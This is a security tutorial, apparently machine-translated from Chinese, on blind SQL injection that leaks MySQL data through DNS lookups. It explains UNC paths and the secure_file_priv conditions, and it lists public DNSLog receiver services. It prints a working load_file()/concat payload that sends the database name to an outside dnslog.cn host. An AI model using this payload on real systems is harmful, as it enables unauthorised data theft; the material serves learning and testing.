This vulnerability is not just for SQL Inject The use of , Or use load_file() This function parses DNS Data vulnerability brought out by the .

Domain name resolution

Domain name needless to say , Anyone who knows something about computers has heard of it , I think I know something about DNS analysis This thing . Simply put, a domain name is parsed through a server to get a corresponding IP Address , And the process of parsing is layer by layer .

There are a total of 5 level , from Right to left analysis , from Right to left The domain name level is reduced . Use the dot . Split level , Low level domain names should be resolved in high-level domain names , So if a domain name is ：zc1t6a.dnslog.cn , Another domain name is database.zc1t6a.dnslog.cn, The latter is resolved in the domain name higher than him （ That is, the previous domain name ） In the implementation of , This parsing leaves some parsing data , It can also be understood as carrying sensitive data out indirectly .

Because the length of each level of domain name can only be 63 Characters , So in MYSQL Got more than 63 When a character of bytes , Will be treated as a wrong domain name , There will be no action to parse , therefore zc1t6a.dnslog.cn Will not receive parsed records , So we can't get the information we want , If you encounter more than 63 I'll use it substring() Truncate read .

By the way , There is another rule in the domain name , It can only appear Numbers , Letter , Underline Data such as . So if other special symbols are included in the obtained information ,load_file() It will be considered a wrong domain name , You won't analyze it from the network . However, there are always methods, such as replace Replace , Finally, we can exchange the data back .

UNC route

In understanding UNC route Let's look at one DNSLog Inject Of payload

select load_file(concat('\\\\',(select database()),'.jtc581.dnslog.cn/abc'));

there payload There is a problem that people don't understand , Namely concat() The first argument to is '\\\\' , What if you replace it with other data ？ If you are interested, you can try it yourself , If you replace DNS analysis You can't bring out the data , Why? ？ That's what I want to say UNC route The format of , Reading remote files requires UNC route .

UNC（Universal Naming Convention）, General naming rules , Also known as the universal naming convention 、 Universal naming convention .UNC For the Internet （ It mainly refers to LAN ） The integrity of resources on Windows 2000 name .

1、UNC route Just like that. \\softer This form of network path （ That is, it is preceded by a double backslash ）.

2、UNC For the Internet （ It mainly refers to LAN ） The integrity of resources on Windows 2000 name .

Format ：\\servername\sharename, among servername It's the server name .sharename Is the name of the shared resource .

Of a directory or file UNC The name can include the directory path under the shared name , The format is ：\\servername\sharename\directory\filename.

UNC share It refers to the sharing of network hard disk , When accessing softer The computer is named it168 Shared folder , use UNC It means \\softer\it168; If it is softer The default management share of the computer C$ Then use \\softer\c$ To express .

The command line access we use to access our network neighbors , In fact, it should be called UNC route Access method .

（ above UNC The explanation comes from Baidu Encyclopedia ）.

since UNC The format of is two backslashes. Why do we use four backslashes ？ The answer, of course, is that the backslash has the function of escaping , So one backslash escapes another backslash , Finally, there are only two words that have the meaning of a literal backslash .

DNSLog Conditions of utilization

DNSLog Need to use load_file(), therefore load_file() Permission to use is essential ,load_file() The conditions of use are root And the configuration must have certain requirements , Use command show variables like "%secure%" Query permissions are as follows ：

1、 When secure_file_priv It's empty , You can read the directory of the disk .

2、 When secure_file_priv by /, You can read the root directory / The files under the .

3、 When secure_file_priv by NULL,load_file Can't load the file .

If NULL, The modification method is as follows

windows： modify my.ini stay [mysqld] In addition secure_file_priv = ''

linux： modify my.cnf stay [mysqld] In addition secure_file_priv =''

This with into outfile and into dumpfile The conditions used are similar .

It was said that DNS analysis It is a low-level domain name that can be resolved in a high-level domain name , So if you want to learn this thing , Each of us needs to buy a domain name. That's too much trouble . Fortunately, some platforms provide us with free testing DNSLog Temporary domain name of （ It's too conscientious ）.

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

Personally, I prefer the first one , Mainly more convenient .

DNSLog Injection test

Then simply test the database search 、 Look up the table 、 List 、 Check the database in the field to find out .

Use load Instructions ：

select load_file(concat('\\\\',(select database()),'.xiw0zu.dnslog.cn/abc'));

Check the library 、 Look up the table 、 List 、 Checking fields is done by using conventional methods and bypassing the previous writing .

  The same is true of topic making , Can be used after closing load_file() Ready to use DNSLog Inject .

Reference resources ：UNC route _weixin_33924312 The blog of -CSDN Blog

UNC route _ Baidu Encyclopedia

Domain name resolution _ Soy sauce ; The blog of -CSDN Blog _ Domain name resolution rules

DNSLog Inject _ Two ladies' post it notes blog -CSDN Blog _dnslog Inject

【 Old matches strike new sparks 】DNSlog High efficiency and no echo penetration - affectionately

DNSlog Inject detailed analysis - FreeBuf Network security industry portal